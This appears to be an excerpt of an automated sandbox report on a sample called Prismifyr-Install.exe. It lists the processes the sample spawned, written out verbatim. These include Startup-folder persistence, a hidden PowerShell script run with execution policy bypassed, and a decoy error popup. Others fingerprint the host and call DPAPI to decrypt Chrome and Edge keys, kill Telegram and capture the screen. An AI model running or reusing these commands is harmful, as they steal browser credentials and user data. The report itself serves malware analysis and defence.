      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\202491-7716-19tt98d.qpv5.png" "
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()""
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\vi0IK.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mydyhibp.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES25A2.tmp" "c:\Users\user\AppData\Local\Temp\CSCDBB13EE0A1FC4822925E9A81EA23E611.TMP"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:list
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "Speed"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /fo csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Telegram.exe /F
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\202491-7716-19tt98d.qpv5.png"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Telegram.exe /F
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Telegram.exe /F
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'currentuser')"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'currentuser')
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'currentuser')"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'currentuser')
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'currentuser')"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'currentuser')"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'currentuser')
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'currentuser')"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'currentuser')"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'currentuser')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'currentuser')
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'currentuser')"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'currentuser')"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'currentuser')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'currentuser')
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\3
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\6
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\7
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\8
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\9
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\Prismifyr-Install.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Epic Games\8XTZx.ps1 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
